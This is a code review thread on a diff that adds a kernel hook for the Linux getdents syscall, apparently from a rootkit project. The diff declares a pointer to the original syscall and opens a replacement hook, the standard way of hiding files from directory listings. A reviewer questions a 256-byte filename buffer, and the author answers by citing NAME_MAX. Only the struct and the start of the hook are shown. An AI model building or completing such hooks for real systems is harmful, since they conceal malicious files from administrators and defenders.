hook_functions/getdents.c

```diff
@@ -0,0 +1,45 @@
+
+struct linux_dirent {
+           long           d_ino;
+           off_t          d_off;
+           unsigned short d_reclen;
+           char           d_name[];
+       };
+
+asmlinkage int (*original_getdents) (unsigned int fd, struct linux_dirent* dirp, unsigned int count);
+
+asmlinkage int sys_getdents_hook(unsigned int fd, struct linux_dirent* dirp, unsigned int count)
+{
+        int nread;
+        struct linux_dirent *d;
+        int bpos = 0;
+        int rem;
+        char file_name[256] = {0};
```

Comment:
why `256`?

Try creating a file that it's name length is `>256` and see what happens :)

Reply:
file_name includes only the file's name not the entire path, as defined in [limits.h](https://github.com/torvalds/linux/blob/master/include/uapi/linux/limits.h)
`#define NAME_MAX         255`
what am I missing?